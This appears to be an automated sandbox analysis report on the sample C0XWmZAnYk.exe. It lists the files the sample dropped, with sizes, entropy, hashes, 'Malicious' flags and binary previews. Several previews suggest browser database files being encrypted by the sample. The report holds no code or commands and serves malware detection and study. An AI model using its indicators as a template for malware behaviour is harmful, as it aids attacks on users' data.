              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):15331
              Entropy (8bit):7.988877985812178
              Encrypted:false
              SSDEEP:384:VcHX9r7gkk6cZuRGiOrPNFzz9hoZtguc62SrMHr:VcHNHbcERGhNp9hoZtvB2SgHr
              MD5:8443224CF4E6AFDAA39DD99998BE21FC
              SHA1:E2E9B4A88CD43577FDB176419074EA716213FEC3
              SHA-256:A29B83E8A74585EDC3632B8DF8DF500D6C01F0199C595EB27B14943D1ABB9E99
              SHA-512:4BAC06067F301D9099B18DF988143E2CF8DB6B870B8B3CEE778B046A61A0470FCDBC0474C2FA23B4D5BDF67E6E516AC60033C57AD2943B703369D8034C9B2BE6
              Malicious:false
              Preview:mozLz.2......p....B.3......A...j.aE.H....Gt..}/omy.?.L.pY.k^%.....#......w.........+Z'.p.o.'......i..-A.}.Z_.4^'.z.8.Bg....W.....0.T....|..)...9f.9...~.....9....oP..l......+.Jcu=E..3..E[.&...su.q)gf..= ....2EGd.onx.o;....v.b....Q..]...@ot.#.8.r;.n..VW..6j.#.......(s_.]x....f.IV.pt.._.....acw(...t..w..$Mja].......,%.....(..Tj9n...l..zP.].L..5T..d..42RI.7M..v.i..{..TZ.j.b6.k`..f.K..)J..../....L....;..|.%)..I.h.`$[N.bw...b=..!h..w..%..l.9Qd.(i.=.v,.z.)..eMK.%....!.fDn.+...L..:n....hm.t...bv2N.. .............D$.....S.u.%...e......%......P......h.........+..~.~......h3.b.j.p...eg.......3.P`x.Xg....`.ui.<.@{.I.i.pI{.....t...X.4g&.S...a..g.A...N..D../..w.qU.z...C5......i.?n.@....z.<b{w.p./.;`.V..@.......E.4...AR.%Y..8.D....4:.l.3/....`.I.w.{....~.^...&..l......c.e.i"X*|B..~*U."%..[d.x.>....4..I...m......G^.g=E.........M.........J.<...L..l.d<..%...y..bLl.S.l.).:.D.~....L.,[{q.++.(V.Ab.4..o)..Z./P.....0...h..y..#r.?cS.]..;/hN....c..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):13637
              Entropy (8bit):7.985316069821006
              Encrypted:false
              SSDEEP:192:HzHFj0eZ43z7088R3zX6KLVomepLiPTts9jQl/qqw1UITEStbFMi46Nev:LFnZ2z70hjVomLTa9jUqqw1LwSciYv
              MD5:AC84532A674E7B9EE1F626F962F1FF21
              SHA1:8BBA9198FDF18A928634B0C65422D1434D9C549C
              SHA-256:4DFDDE5E3E7076909E84FFF47008A710DA74738E0D52C872AE6466F241D8E040
              SHA-512:F4ED5B185CEFA13291B38CCD225A46F85518170AC709D36B8044C5E3D86F100914F03F1F0C2CE430F084DAFB68B6A029E7385F570EE8A173F12949A8A3FB28AB
              Malicious:false
              Preview:.....$..h.....<.?..W<.......R0.0.^..._..7)..{O...yK.P..>.K9_.'.....v....:n....9.P .\&..$F..1......A..7b.f.)mF.!.......(UFf..U....IY,..)|..X7.../.#...@....m.ZY..7..P.eO....l...>.Z.*.....].elP. ...w...].......w...*.u].^.......x.!..+.\r.D.....r...0..r[[s......p.$..!.6..fov.....i..1H.x.$M...fO.V).g..o.U)......Mh.R(........h....F.....).v-.+.B1zV.c...WcBy.0+..4Z.Ev......$-..?HH...L.E...h...2b....qgS.$..wT...R.<#b..n.....v.5.z.m..U.M.]...e..Y..(.. ....J!..a!l.\.!f|&HK6..F.(...qZ....jgC2.HS.G"..X..eRu.{.K..{..t...h...I..(p../)J...m.......T).C.d.r.d...2W...e{.z.<...........M..N.`....H.......7...[..T`.s1n....w..b!..F.:...X.13.y%^....dn..I.^..l..........2.+.-.8yd..Z.} .6r......>..w2H....9.R._..M...}.....g.3......(....s.Z.u..Q_...3.y..|,I.w.9..U.../..i.,....GJ.....?.?..F.t...............e7.L.h...^`~Ay....&.K....W...:.3..2...aD3..*.}/..Z&\pM.(..9......c..0.c..q.(N.!v$.s.S.. .L'.p>7...2}......Du..iF@..&.O...)....T`_p.[!..#.5H... ..)z...S.AF.C...t
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):495
              Entropy (8bit):7.510023252949106
              Encrypted:false
              SSDEEP:12:YWo55CblSRE3muBGRqAQnklIXQ/DEHbxoxA36ldxa3cii9a:Yh0Em3Z0YObEixAYd+bD
              MD5:9067BC5971F99EFF331CE27A396D30AA
              SHA1:0751FC092F5DFFD96ED25E545A9BA5EE05E08597
              SHA-256:384230A9A50590FF2C98D1BC4B608A8858F43217798A3432267D4290227AA72E
              SHA-512:1AC12EBC2D7822879774E2905D679C0988BEEA276857D1B4050C7CDD08FB57152F5E42B4706C0B294BEF4A12F162F1A4417C725DFC7115ED60F6E835D812ECF0
              Malicious:false
              Preview:{"sesY.p^.p.6..\Z.FUj.N.?.L..? .+.gD.iK...A.}{.E.....D.-..u.....(.Y...A.......$c...8.*4Z!F.Z7.c..lT.c.2...=;....H..g.b9.._o......a..........*...B...|+..C.V.x6..6.U. h....(a.=..^=..x*......H3.<.]+.....B.1..'.`8..>..@.J.H...~".mc.@./..8*W..(....RZ...9.V..l6...@....^T..0d..e..kh=.*..}O...n.Y..K.GA....3!....X..G..7..!.H......x~U"~...Z.NrQE ...W....7...Lb..s....,..X...i.ada...#.l*.a.z0.r.f.........f...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):385
              Entropy (8bit):7.3488033059715185
              Encrypted:false
              SSDEEP:12:YGGAYCjuAyy6r7xmqcJQeHQ/63dxa3cii9a:YJ9Cv6CJQdAd+bD
              MD5:38AE1960B1FCF27680DA9F0B267A4D44
              SHA1:766C39BBF49164B92ED8972152FF64DE0DBBF410
              SHA-256:4DCBC03AEAC52B4134FF8A1361BE9284E900DDABF2B3F0EAA466900FD9564BE3
              SHA-512:07B8E54D5AA699EF80BC0788AE60076DDBFB37CFE8A412384003CE9693023DBD694F08CA5749E8A07C84AF9A884DE3C5CD874FFBB695F65E1B6ED91C67F98D3C
              Malicious:false
              Preview:{"cli`W.....6...}.H&.u..F).?Z.%m.x...S..o'Prq._...FM3....>.Rf...;.....q.K...... ...1..)..q.1.l..:t.MG?tBZ...T......f.Z.Gj...g\R...?g..`.P.."K.N.E..@j....;[y.UIWy.:p.Fj...S"ZF..*..@dxV.p./a<<j;eb.%....?Tc@...(P>V....^st.j....r...<.,7..]U%W..2z...s.3......Z..T.q6..w.ru.......M.?.0O..W..:..%."G....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4670
              Entropy (8bit):7.949504146356056
              Encrypted:false
              SSDEEP:96:rpYZp/uo7bgJAJPupci8wh30SICxUicqui0LxAnkWq:4N/r88O0SICxHcxv5T
              MD5:FB13EF41B4096E9090EB130F5E609952
              SHA1:693B04712C6D7C69CEE28AB9EDE82A2FB3FDBACC
              SHA-256:AD4319B218631EAE9E0234623FD309736690DFC55E4B93DFFB6A08572D75B518
              SHA-512:F09041B916BD071500E2D0F7C0119609694D1B5BCB1047B0990AA80DB57E8BF2D66DE8833B6D35C2A53FD2194FAEAEFFEF63FE8FA2193A01918D4F481B3569B5
              Malicious:false
              Preview:mozLzL.x....{y..4.............D..X...O.w:..g2...\L+.......6..v.... \.S.oY....<f.?.g.M...c.....2..B.d.`.....D"..r..9..f.8..<(R..u.g.F......%:._...K/...h9..|.Q.L...!.W...-(0.....g.....Y`..n....F.....7.d..........+..".."}....tOp0>"...i..p.?.@.s;.......yj......*.......E..5....&.>6~.....1..=.q.gi.D...RE..b..".E@.~P.>,.......")...".=...Q.!..xp@M_...#0.]r........74.>.......)o...:$._xf.-u.j.Mb.7.?`!..Oe3.i.:pj..\..l..xT..AV...JI....;....4.B....R..8..p.x..K.~.8CGb.G....\......GyA.u....b.4>.t....F......C.2..a..?...THT.........R....8FLS.#h.;..#95.+Xh..!....>?.O../.w.^...s.)..).XTO/|d..d.u_..y..J....ox.......^<..r...._.O...B?}Q..u....q.......p....<.J...C.?....c.#D.....w....O5.!......MR..:y.7z.M.7....U~T..M...F.g.P."g..o"0}?.*........3...9.R).L........H.5...J]...Z.h..W..<P.u.UZ..3....u`........K...I..fmO....t..kR"L)..%.j.6..I.h2\._5..g7d.#q.u..E._.W/.b*.7....p..>..[..6..tK....$h..O+i..7%.......w..1.fl.Hi.k:.e;....#.,..M.s`)s.j.O..!..2#(.)..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4670
              Entropy (8bit):7.95593167925888
              Encrypted:false
              SSDEEP:96:3O89frVfHkqN1TNdEl1Ag08oLRbOsiJk4ccO1ZAK8zXgGvS6R:3OijhtPNItG0szcO1IzvzR
              MD5:034296927087CB63E81DD3CB5462384C
              SHA1:C6302B9051D240A8ED8612F4990622FAC8503141
              SHA-256:4A16366DF286293FFE1C94C8BA3F77FEF1E8429B28420F7E18BD58376BCEDC66
              SHA-512:416AE7A500A7D34E4AE2E8A20EF273C55BDCAC8D7C20338E1C2DD6BC287FD4E4DDBB459C6AFEBAD1A6934B311F50C5C719471823DD782D8492DF5CF04D6999BD
              Malicious:false
              Preview:mozLz.J..Z.aZv&..w...}.,...Kt.I2..UQ.......|_c.-Q..JL.}M.....D|...q."2]...`Id.....o.......X.2....%...$N....?....L=,.C.........7k.}..L,.4.q..%.d.6R..k..~.!t;.h$...\K... q.5K.M3.`..\......K(..gM.......|.....,.Z(.>.y..9;.........g..|...d..?m)*...Er..8....W..v.V.....g.r2-N6.....y.p.e.l....V..0PI..DA..j|.._...T...3."~q,.M.N5.U.7'...T< .B...5...j.k.\4d~m.l..]o5.p..lU. ..P..7*.b...C.U....oU..\.`v.m4.\......T.ef...H6K.[e...........L....,.e..BR#.....4Y.M.j[.o....Wde....^u`..... ......`...1%W./..Qw.T.-GA.:........Y......'..o..._)...v...P:A..;[RV,..I...q...9h..}).t@'EO0..5......,... b)..WD6.9+0+....R.Vt.d.6q.`.N.%^.....*8..........@..`.1..B......L.$\..e..1A\p.e....v(..P.x....B.By...%.q.........Q$~.......2%.P.....q..$4......~..m..#.......T..&R..F.,1v2...W=.B..Io....N.D..22.z....;..Qb...?/.=X.X.;....Ns...7".2Qw....o.._s...Y..GR...|.V.y.<.....'...9..<.1*.8....[I..[..#...!/.....K..5..j..L..M.Vwf...*nx.b...t../...;...yE;.H..J....!..9...4E...f.z..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):131406
              Entropy (8bit):7.998550489312081
              Encrypted:true
              SSDEEP:3072:jrCQUJDDU27lIInrMD8CBIzqXlX1m4/q1R9QM8oH5NSXYn2VVz5F9n:jufJ8ilISFC3llwR9Q+ZcYn0Vz53n
              MD5:448C564543A25C8B5B8F50BDBE7E9383
              SHA1:CCE6C1CA68212CC7A59510DE9B036CBAF0224553
              SHA-256:AB68792583D1C67A8EF7A33A76EFB9C01E7A0A5911160861A00D33068418B7AF
              SHA-512:E131B989AB74659CF8E20BFD5E46A662F47128E21BBC153743307FDD14122F0AA69418396510D0E3BD35EA4D2F2CAE233C07DB799269B9C51D59CD744C165346
              Malicious:true
              Preview:SQLit.#/.(....#.G....1.4..s.d..x8P'qL..u....3....w....4;.....U<.I.v-$...J.z w...s<X.....R..E..L.......A.......n^.N../..k.0.(.P.-c4.c).....3/.(T.N....P..A........j.t..Mv.W.4........?m.ln..iGd.......-..8D..3_.....G..O..1..9..C_........#:..hX.>...g...pI.*...N.>G.....M...8..PQ...9..Y..lLy...~1u.xK.;i/Z.B......eF.JY.-.1.R......1.B<...a/...wx_[.T...d...e..zJ.......S....B..7..fAT*%.Q.U...6....#a..q.$.....on....1(...... H@j......>..j4.."-.....6.&w...B..]k.@3....3....S....*p?h....M.j..$Q.,T=!.Q....`.`.E...s.:....'$.o["...B...um.....%..i........)...].[9.Nt../..w=.df.r..y.........uxosu....P..9.,c....El..x....~y.X..mq......vM.......[.\.....hC..![.....`...........I1.S.Ec..m...j.O...M..M..+6./.nq.[r....~r6M..h.. .(.p.Q0..'.X6vr.w.@dt....hW.n/.....p.......!9.M.!&.h.....A...F..8...ML.y.....].......S...........:.1....s#v...Y.A.$./........2nQ/....+4.>[.V.{.....wT5..<Z.........w....r....h_{K...Sz3......#._....[V/i7.....7x.....=9x...[ez.N..$...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:TTComp archive data, binary, 4K dictionary
              Category:dropped
              Size (bytes):370
              Entropy (8bit):7.324832569231733
              Encrypted:false
              SSDEEP:6:ASC94gOlOvBg3XATN8S7bdkF42OosGyHBPdjVevwBi4GXOrPSdxa3cii96Z:fLwvBuA+IbdkFUdGCPdB3Bi4Edxa3ciD
              MD5:9AA32C598AE54517A782EB1B41B0EC1A
              SHA1:B67971A74994D8252DF3AF36C1421D3A8FC8E980
              SHA-256:8E28FDF664F804E52BDF2C9212D3ADFFA2CAB34364238D02B26792DE49C74CEE
              SHA-512:D94628971A6FB2B25C426CE2A115CB1C251475D83A9137128CBA813058A922E33609B4BE8AA1B557AA5AEAC25EE43873DFB605ECD3E6A8274592EB9E61171EB3
              Malicious:false
              Preview:....&".I..A.......'A.<...$....hi.o.r_.pzW..'<..-Q...O6.........4)9..*..Pzv@WB...H. .vD"...-"RN..`5.1...{.Y^....Q.j...Q.`....lO9.......1..[..*.u..)..wG;.E7u5.X.....-.o.E.%\#~.d...&.._.e&r?.y........c.P.A.6;..iu.hb..X....R2..Y....RO...o.N..l......S...t........F.i.~..l%.ci......]q..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.9964521966264455
              Encrypted:true
              SSDEEP:1536:EB9VgCNWoQPmtHeNySJ+X97MLHE20AK2M1rzZxEAKf:EB9CC8oQOdeNyC+CYWK/3Z2AQ
              MD5:D2AF314D8054887D8C0C2A15DA813532
              SHA1:844A94DF41B4E0BFAF7A47598BEE84B643864B38
              SHA-256:DD78D1B1E563BC7BFF309730356D9AF3CE1FFDB73F498A4B6129C8CFC1CC8DD3
              SHA-512:288EFD823FF44479A57930C20F859D470192188230C9A2C9CA60E03926A1A7E64D0799767A9F7A3243EFC31A3F9F7A25B53110643264121EDE2937AE62E94535
              Malicious:true
              Preview:SQLit.7.2.=...L.:0...._P..q.8e.........2d.6@U_<....!H....O.!oZ.1...#.:B.w01s.3Y.0.......XasKm!7..)..]R........0@.... (]..>..a.....n....m.,..i..S../.e.....Uw.k...,>3....`1..N...#'.....]Z._..A0..B......S.;..8.Ge....0.Q.k.s...3....r}.k...(...Y.\.E#.'%......>_.JM.......R.g.C.)-+.}.<..^`T.Rw...Qh.%.d.y5.N.&..j...?E...X.Y..}"H,......##......P.?~....._L~>.K......8....4*C..A......X.!.d.~..@...M.H8..+.......8.Y.i.X....O.....y..r....jH]3E. ......u}...E.]..&..|..|!..k.......[.f.....2,...`kY...8o....Z..LSG"X.e)\..Rp..AV?jA..M..L.......E..h....+..T..M ..?L.u..Wk..g.".cA......t..M..X...3..T&......P..jg.t.("3..'d.F|...>aL.-A...<9.R.r..:..'@@.2........Dea......@...&...d5H.....P.w..Aj..+.......#.f.*..."{....:.,&^+0-..../.:....K.Ga...T......_...5.}...........$lf..X-..E.S..y.R.P.\..r.j.K.;...c......m%5..#....fa.7[.ns..Np.q.Fh..F....S.Z.Rr..N...>.r.{96...y.n....R..4.....$.M.6..69..%.....'8.!Oa....e.r.on?"7.At...&Fo...7.tuc.^1...6.^`o..CQfd2]...3...St
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.993505044133653
              Encrypted:true
              SSDEEP:768:GnzGgjEPYk5SvAz7aIUoBFpiySSUISpE7cp52ahMqpN4axg7egirL00930N:iFjEbuAzUugyl0pOi52a2YNRxgKRrzx6
              MD5:24E9AD003382D18FDB120840BB800EA9
              SHA1:5FB05F0EADD2077FD663DCFD852795626E1BDAAA
              SHA-256:BB1557DFA33C552DCE1ABB49FD82F0DB2EC48778CA253AD2E6B472D7A3433457
              SHA-512:299EDA008D5B1D24AF0C408CD192C1C9BF5E776F767E94C299E16CCB2BBE27F53BB878910515AC98F371E7C766BAD899B7DE13975299BBE6BAD88C2750E60FDD
              Malicious:true
              Preview:..-...g..~9.u'.A...c.H.......n,-dT..Qn.3}7*.R.7.Y.1....._&......,.*h....O>...^].Q~....CJ.S4.|..).19BP*.....x......#P./RO./x..[.r&.u..6.Pf.....m..o.....&..4..l.R.8.9..5.Q]N.bH..9|....^...@..v....;..$h..x8.........$...$..Er.r..u...}%....2..ZM....1.K...B.s...*.#..9P..r,...:j....O...U..../-v.....)...,........g..{.#B/...(../....(.......)..,.j..W.=...(.."....,...l.|..q..["..A{>..>..K...>.q.l@h.........?........=..#W.gZ.b..xx.........|]..=c......Ie...q..>r..v.....^.+....e.b...>.J...!e.;.W.-@-.....PP.....L..{..~WY...rE.6y&JVlZ...N...gM.E.*~....q<....jE6.4...%.....l....t,1..b.w.O..&s.l?.....9i/.s..^?.L.K.....\...d9`.y......I.b{..y.q8o.z........D....H8.sTn..v..G.$...6..|.T..(...o6.,...>..d&V....d...$:..Dk5S7,ChX.i...[....:C/P.Z..(?h7.~...4V.......~..Xi`........rA..s .S_.|.......R.9QpD.c..,JS....$h.M-r.qt....2.u=..m:.F.@.x....te22......4;.Fv.Ey....p..]{W.yc....U.'I.S;..e...._..s.w}..Y.|..c<t.6.x..\/:|.'iP.Z...."PK....!..k.../....9..g.$...Jz..v..]..6;,.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996324509541102
              Encrypted:true
              SSDEEP:768:bNF6YhqbhVWugT/OD4/bBapnMEzPnJEsEqsylLK0+DnOFrD/0q7:KYhq/w+4/bBapnMGPJEPqsy80qnOz7
              MD5:1C37255EF24B0DD196334BC29467CB35
              SHA1:D972C01F33A4D361B51B036FC9459A3ED92DF8C4
              SHA-256:8F1ADA1228FDAA56E0765E82F1C1E3E57236849C8FF1BE5B4F7B4E028594FE87
              SHA-512:39ACB6C76CCDD2262F0ECD6E046B44ABE86A8CBDC8979DA0E7BBF728AD82E67E9C6C456AF319E0A0C1930B3A41B65F782AD98CBE2D296A70516A53C524B303CE
              Malicious:true
              Preview:SQLit...F>...............w....."5....g..8.*...w`!.p...]..d..z.N.+........]............S.......Pv...@r.q.C...M.J...&6..p.-..rz.a>[.s<F........\v..e./D.Ax0#......e.F....-pz..A.;M... U.f.D...3..6}.Z*B*..\!Y.B.A.G.....p.%.,Z..(...sC....7..<.....L@{{#...v.S.wGK..at..ON..<.~X"....)...8.7.QV..O...D....F......2.......... .5.rU@..0..pN..S.z&0...V.]......f....P.....-.\.....jY.a.Q..u...#.;3)....M.!+....O`t..93].C.........|.G.!..<J..X\...k...I.........Q..u8{..\..kvh.B..8u......gm...\..A.J....o...c...8*.s<~,~U.._..d....}...X.K5.bk@.........j....9mK.'.7......c...}.......2.,.s.0!..0.}......q.P.S..(.k.r*....KV..R[....'.......!.N.S{.V.&.n....1..\LQX.;.jJq.S.../,.W...;.....e~[S:*g..]........`q..X...!7...&.e..x...f..$....5$..NM^.0.31.L.Li{U.....e.y..y*...*....W..8T..p.e.M..2.+..f.0../.,....o.....]..@..5>e..,{..>.y...S&Tb........yk?...'h.....pT..../....\.$........:.;.Z... P..k....].OG.qL.wh.3.9...I.I:.."A.....v.y7e.6.MN$.."..........`............ .v*.{^..r.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994516667884109
              Encrypted:true
              SSDEEP:384:Vc+tLdKJeBR7ONwQeM3wTJ9JunazL72eFKnOVfmQ8nFvznxpJFstpVqq9EsFoiuL:ynJARYrFIJDDinFDEorG9NC9ddF65mOs
              MD5:E2E0365BEEFA9961E2477CF4A45D3DE7
              SHA1:1B4B8F1D3E1EE650D9738E97B284F639BBDA1C60
              SHA-256:EC96D3D6C524BB74AB8E9FE43CDF91C570A02AC0505C4676D03C06842DEC48FC
              SHA-512:B10ACBC197E47662F30C7420FBEA6C161309A78515BA9013C723D9BC979D412665F737B2E7B726E17F85D327C83E8849B5344F3F0D3B543DB603FDFA10D8EFB2
              Malicious:true
              Preview:..-.....n.].<....o.Ky.......&.>....!.o...y...>.z.s.O.7.R.al.....l.{.;3.[..q.:.,..=.:#B........B"..a.W.|.._<N.....J..:..-pi..........i.........%<.).U...P]...f....z3s..*-3l......h.\..z..lY..hP.V.?..61....m9V..l..,Oebk....E./ ../..&...@../9._....10..gLr.Q$.E.........jDX.3.L.C....uM...............-j..T...)..$M.2..?...F...X?.+d0......q.#.v.|..C..@G..........+./tN...L...Z...(..[).k..$.m...6..1..Qf.lH.p..>...-Z...dn>B...q..kz.XH.L.n*.B..V.;.....k.Y...".~.....u.4..../..b......J!.W`..q.Lu.%..U.....+l.Y.\..c._.QUh.K.5...G....A.:=.:]....'d(.Ur...^T.........q.#.:......!'.b!...q.y'.8}+...K?...[..F.._.-$...9r..xA'.`-..+.e...ZbaBfR.):...1..H....2.S.l....l..v>8q....f..".@..5...]..]....n.:A...:.<....*...Co.g....un.....B...I...0...a...2Q4.nw.Vh/..5.Z.^`.'Wc.Vu2YF..p,wVD6f n->.^..n.......p..i^.S...........Mm....7u)[..=|q....+HA.......Qh..c{P5|...M....^.g..pUi..D..:#^.aH..h..b..Pu.*]...D..n^.....Jmp.j.....t.)...^.h....B..J..4....">w.9.ThG...s.j..".:
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996164767264024
              Encrypted:true
              SSDEEP:768:7OH7vPF+7IfPcEYL8ih9zuS4H8TD5neblFqbrojw1rdTfpWR9SapQLUcRpi2Ijs:7OTIBEYvhhuStT9nm2UjExISapQRRgW
              MD5:BE90A641E5277B06E0E5A762CF6F7997
              SHA1:D04920F1FBEBD582688E0BD9D1DCAB0BE14B37AE
              SHA-256:C3F3C21633AA94EB7F0AC505D5D6BBED4E47618A71D903610D6529F2F412DD8A
              SHA-512:B18F71209A3F7F6173C7E2EBE6C84A3CC82FFDD906E878C5B9D5D73737CC51C13F7F5BFEC04E6FF095E7F7748BBC635D67E651EFBC06972C261115E10A18414C
              Malicious:true
              Preview:SQLitB..:...a...84...3"....[y&..(2.(.....<..I..zT!]|.t8|O.l...e..`......,~.....Ka.JH.n....9t.........7....q..i.0.:}......z9..:..g.*W S.:,dXL.........s0.r.U.<.lS..a.....4Z|!...F...i..3.y....-..j.{Oy..V.gO #h..9.14!.w....X.0...[b.Q.z....;..%..td..h~D.j....cEf.r.......5Q.n......k....Q-.........+.k...5.'tH..8.D...0\...)...:.O....`*p.....B.bE\~D.~G..-{5.yO...K......b..,..n..I.Z..UH....o...v.ca./.....oU..b..z...C.ca.#..-J..0...?..Y........>w..[9..z.....=....3.*.....p_P....}.Z....P.. :>..[.w....E.p...e.7..G.../.......[....,..]...g.V.........Y.. .....S.9...............J..d).f.;.Z......eb]4..........j.aA...T#E..DqO.1S.}-].9.j.....u.....'0Y........n.0.$Zx...C?.N......dH..R.46.j4!.Y.M..42.\...f...M,l......Y@'..h.[..Uq...'.`.X.M.M3LL.z4..x53.....5..DB..C8.W.pa..J1..}.X$.mc...??..o9....y4".m.//nN.*.N....U..i..?6L.6`.UZ..R.$z.#N..ms.^.".ns$... .k_...yP...c.. ..|...\...K3Z.3...=.Pe.b.5A.<BN...'....*.+........F.......I...>..C.....ec..mO......g....#.....j
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.9945532249928055
              Encrypted:true
              SSDEEP:768:edkA4cMz2yh6t/w1IT7JlldOyRLyvWulftjQfJcPPguPLC7Rz+Gt:skA4nzLEMILldBRW7tEf6gGLCFZt
              MD5:E3F305259A17D21C3609C0EE551CCC7D
              SHA1:7FE5B60F84EB4E99F68B603E2793E908B8C6D825
              SHA-256:E3F3C9F7FA88E6494388D1E00E32C360381CE5993763D9D39A5F57126DFA7DDA
              SHA-512:E6343D1BBABEAD159CAAD605824952A1C1FF81CC78730009954166C305C3CC696C4EC1480432B545C5B725D35B34F721FD2F7CF94A00BEF4771280E1F50E43FB
              Malicious:true
              Preview:..-..i....g.8..z..M.AqZh.^..b.'.<6m|.[ n.U..B..IZ..c..p...tZ}H)...]..!..V%Wp_.<&%........7..^,r.....y..d7{.A.r.....\.=.)r.3.\.d...G.9s..[..8......0.q=..7O...XCG..,.A.......j|.J.Q?K...y..,.%..V^3oY%....k..3?.O.*T6F+.u.._.>.?)F.8.'..,...f.:.C...)...k......iUj.?9......eg?.X..D....vya......R.|.7d.46..b.F...p..{K'.A....L.......G..N....(.;....Nk/.0.;..C.o.g....4.]j..H.x..gB_..............".u...I...n.}.E.>.fb>...eY.(...AVJx...{j.>na.R...T.....o....].....a..>9..n.4......36....>..2/p.......l.M.rFS.g...:.~.....jB.4.Q.kU....H6..4..j.EnD1....9...... ..x.;$.....Yp....}].=...YU.k.NV.`.:[C...... .....:x...v..P.{.............k-..itXg0.x...lL\p...b.Y"..-..;:..N..O.....W..$..(.urO&T.d..k..7C.0}.Z...e{.c:....../q...C....1.~.D}..5.K........\....rN........3..7.:lL........E..Qy<.j..y..-.I..<r.Xr.l..(tH..^.c..R9NS..n..@6O..#..rM...wrge7...QX6.5.b...|...~.[..<Q...>......u...y..19j......(.b...D...*....f....0=....X.9._..d....3(...,_.H...7j..).rZ..%i?Qz>-
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.995928965524981
              Encrypted:true
              SSDEEP:768:Ve6NfY6JkF8SQKfN7uTjk5tfdLp76aLD6Gwtq8mpBKjsHAm71:wKfY/8cF0jSlNp79mA8+KjM71
              MD5:5ACAE634E6021CDDAE8A0CBEE046F3DE
              SHA1:164E130E822004A35A1808DBE770D37EFAD04557
              SHA-256:0BEE1B5F291C926E9314AC8646597331E10872E751ACBFA1BABAE4353DC8DAD8
              SHA-512:A6BE90A71CF5C93BDEA9B7A8B6B89B2252CF7183DBE22B8BE43FAB3D0390202B0DE1D9A5863337DD7FADD5133173DE4EE8F4C021D465AEB31C0B9B18819A9C7E
              Malicious:true
              Preview:SQLit.'..N.p.5..0.x.~-..q.;E....H.......aC..1.....Hr.0...B...Lz....c.......2.17;...'&.~.......w.C.*J=...b.8..Y0.W..K...M:.....|b.`...t...l.#...(....Q..|.c.c..~..]_/....V.U7.p.I..B..,N...p2U.u.b...c{..].!..\...8..f..s.e|.!`.?_.G.{{o...ZL).Tl.L....^....3.......5L..v..v.ZRH...gr@-5.........?....Z.}.3....W..j......2....j..X..q0.../=...b..G.*...^h{..Z"c......vh....yD.:..`...k....N.N..Wj...F..M....-5.U../f.N4..m.(]X@R...I*`'.?.5...Y(.D.|y.....ri.B.5..<{._.G....A.....:....].+C....N.R[.'..g*...u.J.$....W.X.....k...M9.e.......K.N.-...W...<k...(.O....../s.....k#<.<v.UI.......T...fr.T...&...}..I..._..M.,.....gS.M.fC$.s...k._K....J...j..PlK..K2.gB#..d.k.U.&..o.......IP..|x.,.]..M,5G.p....Pg^.n......|.k..{.-.;.......L.@!w...)....@.Fl\z.'..]I......\.Tr....../.)...[..X..K....NN........d.C?.9j...N,.~....w...;...\~U.Vj.W....'A...j.V.V..W.i\5.p....k..X.._W..NF..:..h.'..'._6..)..\..........;.W......K.=a...~...D........b.{.I...%......\..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.993866241103181
              Encrypted:true
              SSDEEP:384:fzDUBeh7dIk7FvCmTf+7Orpdxn4jJEPFyGDGh1lSucHdnFkUFKTukpQiX08rK4yq:78eh7b9CjUpdy9E9yTh7tpQOjLoysXjY
              MD5:3CC3983BA61F4F4FFA2A8FCE7B89E9AB
              SHA1:667C8CA26EBED207C62F738BC009712BCFACBEE0
              SHA-256:BD1AA88DB547EA50CE9F70B717B5E607F465CDAF7CAF7E23392DCD15BA2DB817
              SHA-512:F38274AAF5133D4B1CFB676769799FF0C331D3A0C5EA8DE10B04ADE36AD25457A17350E848BAF52B35D8ED5B43E2DED572A8D32A30ECABB371B718C718A119E9
              Malicious:true
